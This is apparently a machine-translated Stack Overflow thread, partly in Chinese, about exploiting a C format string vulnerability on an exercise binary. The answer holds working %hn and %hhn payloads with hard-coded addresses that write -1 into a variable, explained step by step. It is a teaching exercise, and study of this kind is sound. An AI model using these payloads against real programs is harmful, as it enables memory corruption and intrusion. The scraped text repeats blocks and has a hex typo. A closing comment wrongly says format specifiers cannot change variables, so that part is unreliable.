C 字符串格式漏洞:设置负值="-1“;使用%n
我正在尝试使用设置变量的值。我可以使用修饰符%n通过字符串长度的值来更改变量 代码 如何将变量集更改为负值,例如“a=-1”C 字符串格式漏洞:设置负值="-1“;使用%n,c,string-formatting,exploit,C,String Formatting,Exploit,我正在尝试使用设置变量的值。我可以使用修饰符%n通过字符串长度的值来更改变量 代码 如何将变量集更改为负值,例如“a=-1” 另外,我发现这可以用%u来完成。只需使用本手册第一节末尾描述的技巧即可。这包括将值-1(0xFFFFFFFFF)拆分为上下两个单词(两次0xFFFF),并分别写入地址&a和(void*)(&a)+2: ./v4_2.out `printf "\xc4\x98\x04\x08\xc6\x98\x04\x08"`%65527x%7\$hn%8\$hn" 解释: \xc4\x
另外,我发现这可以用%u来完成。只需使用本手册第一节末尾描述的技巧即可。这包括将值-1(
0xFFFFFFFFF
)拆分为上下两个单词(两次0xFFFF
),并分别写入地址&a
和(void*)(&a)+2
:
./v4_2.out `printf "\xc4\x98\x04\x08\xc6\x98\x04\x08"`%65527x%7\$hn%8\$hn"
解释:
\xc4\x98\x04\x08 ... 0x080498c4, the address of a (lower two bytes)
\xc6\x98\x04\x08 ... 0x080498c6, the address of a (upper two bytes)
%65527x ... write 65527 extra bytes of garbage (eight have been written by now, so that makes 65535)
%7\$hn ... write the number of characters so far (65535 = 0xFFFF) to lower word of a
%8\$hn ... write the number of characters so far (65535 = 0xFFFF, it didn't change) to upper word of a
数字7来自上一个命令:
printf "\xc4\x98\x04\x08"`%08x%08x%08x%08x%08x%08x%n
1^ 2^ 3^ 4^ 5^ 6^7^
我又存储了一个地址,所以它被堆积在第8位
这仍然会产生大量输出,您可以更进一步,逐字节写入0xffffff
。它看起来是这样的:
\xc4\x98\x04\x08 ... 0x080498c4, the first (low) byte of a
\xc5\x98\x04\x08 ... 0x080498c5, the second byte of a
\xc6\x98\x04\x08 ... 0x080498c6, the third byte of a
\xc7\x98\x04\x08 ... 0x080498c7, the fourth (high) byte of a
%239x ... write 239 extra bytes of garbage (16 have been written by now, so that makes 255)
%7\$hhn ... write the number of characters so far, as a byte (255 = 0xFF) to the first address above
%8\$hhn ... the same for the second
%9\$hhn ... the same for the third
%10\$hhn ... the same for the last
除了
0xFFFFFFFF
之外的数字需要在每个%hhn
之间进行一些额外的输出。您需要计算它们之间要输出多少垃圾字节来弥补各自的差异。如果需要低于上一个值,请使用这样一个事实,即只写入一个字节,因此算术将以256模运算。欢迎使用so。你很不清楚你想要实现什么。您的标题是关于使用错误的格式说明符(%u vs-1)。您的问题提到了一些修改值的漏洞。格式说明符可以更改打印输出,但不会更改任何变量中的值。
printf "\xc4\x98\x04\x08"`%08x%08x%08x%08x%08x%08x%n
1^ 2^ 3^ 4^ 5^ 6^7^
\xc4\x98\x04\x08 ... 0x080498c4, the first (low) byte of a
\xc5\x98\x04\x08 ... 0x080498c5, the second byte of a
\xc6\x98\x04\x08 ... 0x080498c6, the third byte of a
\xc7\x98\x04\x08 ... 0x080498c7, the fourth (high) byte of a
%239x ... write 239 extra bytes of garbage (16 have been written by now, so that makes 255)
%7\$hhn ... write the number of characters so far, as a byte (255 = 0xFF) to the first address above
%8\$hhn ... the same for the second
%9\$hhn ... the same for the third
%10\$hhn ... the same for the last